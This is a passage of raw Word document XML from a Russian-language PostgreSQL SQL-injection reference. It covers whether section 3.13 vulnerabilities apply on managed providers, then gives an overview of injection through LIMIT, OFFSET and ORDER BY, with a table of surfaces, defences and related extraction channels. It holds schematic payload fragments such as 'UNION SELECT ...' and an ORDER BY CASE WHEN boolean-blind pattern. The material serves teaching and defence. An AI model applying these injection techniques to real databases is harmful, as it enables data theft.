              <w:t>актуальна (тот же server-side баг, патчится в minor)</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0CC4AC"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E1E543" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>актуальна (autovacuum работает)</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24E899" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">актуальна для RDS-extensions из </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>rds.extensions</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> whitelist</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FC0455" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">актуальна — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>rds_superuser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> может ставить trusted ext</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3F070B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>актуальна — independent от managed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2172A3E9" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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0B8AC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Google Cloud SQL</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D7B721"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9947B9"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618322"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F0A403" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>актуальна для Cloud SQL extension whitelist</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D10040" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">актуальна — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cloudsqlsuperuser</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> ставит</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036626" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>актуальна</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="17D49780" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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06EEE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Supabase</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07AB73"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490F9B"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E862F6"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292CF2"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ADEE85" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">актуальна — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>authenticator</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-роль с CREATE на БД</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A43D68" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>актуальна</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2E5A7174" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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C4BF5F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Azure Database for PG</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EE905C"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24BBA9"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4042FA"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56189B"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FADD76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>актуальна</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="133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0EA19A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>актуальна</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EBF472E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В отличие от 3.7 (где managed-провайдеры </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>структурно блокируют</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RCE через отсутствие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_execute_server_program</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и untrusted PLs), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13 уязвимости актуальны на всех managed-инстансах</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> до накатывания патчей. Скорость patching у провайдеров обычно высокая (недели после release), но окно эксплуатации существует.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1A99F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.13.6 (SECURITY DEFINER mis-configuration) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не закрывается обновлением</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PostgreSQL вообще, требует ревью кодовой базы заказчика. Managed-провайдер тут бессилен — это application-level mistake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76913B92" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Детальный разбор managed-ограничений — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.9 Managed-провайдеры: RDS, Cloud SQL, Supabase</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA73BB6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.14.0 Обзор</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AA8FB4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Injection в LIMIT / OFFSET / ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — класс уязвимостей, при котором пользовательский ввод попадает не в WHERE-выражение, а в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>специфичные clause-контексты</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запроса, где привычная защита (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-параметры) либо не работает вовсе, либо работает не так, как разработчик ожидает. Эти clauses имеют </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>разные синтаксические контексты</w:t>
      </w:r>
      <w:r>
        <w:t>, и одна и та же ошибка («передал переменную как есть») приводит к разным векторам — от классической UNION-инъекции до information-leak через порядок строк.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0857DD63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не отдельный канал извлечения</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — UNION/error/boolean/time-based уже покрыты в 3.1–3.4. 3.14 разбирает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>точки попадания</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в эти clauses и почему параметризация в них чаще всего ломается:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD4CF25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OFFSET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принимают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>integer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>-параметр в каждом драйвере (старые версии pgjdbc, ручной SQL-builder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B9069" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY &lt;column_name&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>identifier</w:t>
      </w:r>
      <w:r>
        <w:t>, который параметризовать нельзя по протоколу — bind-параметры подставляются только в expression-контекст, не в имя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34800169" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY &lt;column_number&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>integer literal</w:t>
      </w:r>
      <w:r>
        <w:t>, но не expression — параметризация работает только частично</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC2D6E3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (&lt;expression&gt;)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arbitrary expression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — full SQL injection surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BA8FB8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Mini-таблица: четыре поверхности 3.14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2"/>
        <w:gridCol w:w="1381"/>
        <w:gridCol w:w="1442"/>
        <w:gridCol w:w="1735"/>
        <w:gridCol w:w="1824"/>
        <w:gridCol w:w="1496"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="00375678" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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E2843BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Подраздел</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9BB5E7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Clause</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424970F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Тип контекста</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AC3F662" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Что подставляется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AD008EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Защита</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9F39211" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Связанный канал</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="1CCDC9CE"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FCE739" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.14.1</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3F674D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LIMIT N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>OFFSET 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6AC4EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>integer-literal</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11644F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>целое число</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41E49F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>int()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">-cast + bind </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:limit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C6AE6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.1 (UNION), 3.5 (stacked)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="12B83989"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C3ABEB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.14.2</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A7262B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ORDER BY col_name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702A9F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>identifier-token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1FD7ED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>имя колонки</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AB617C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">whitelist + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>quote_ident()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + Unicode-normalize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C7A956" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.5 (stacked), 3.16 (identifier)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="6339E135"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8408D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>3.14.3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534824" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ORDER BY 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035D7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>integer-literal в select-list reference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25E756" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>номер колонки</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28BC29" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>int()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + range-check vs </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>len(select_list)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C75CA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.2 (error-based, leak count)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2EA54830"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81A218" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.14.4</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344585" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ORDER BY (CASE WHEN ...)</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5BA7C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>arbitrary expression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405A6F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SQL-выражение</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9FF56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>parametrize через index-lookup, не expression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2543C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.3 (boolean-blind), 3.4 (time-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15CF23B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4699175D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 (UNION-based)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — UNION-payload часто попадает именно через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-injection point (потому что после LIMIT стоит конец запроса — идеальное место для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t>). Граница: 3.1 описывает канал извлечения; 3.14.1 — точку входа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A22315C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 (Boolean-based blind)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.14.4 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t>) технически создаёт boolean-blind канал через порядок строк (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY (CASE WHEN cond THEN 1 ELSE 2 END)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> меняет порядок rows). Граница: 3.3 описывает извлечение по boolean response; 3.14.4 — конкретный clause, где boolean response — это row order.</w:t>
      </w:r>
    </w:p>
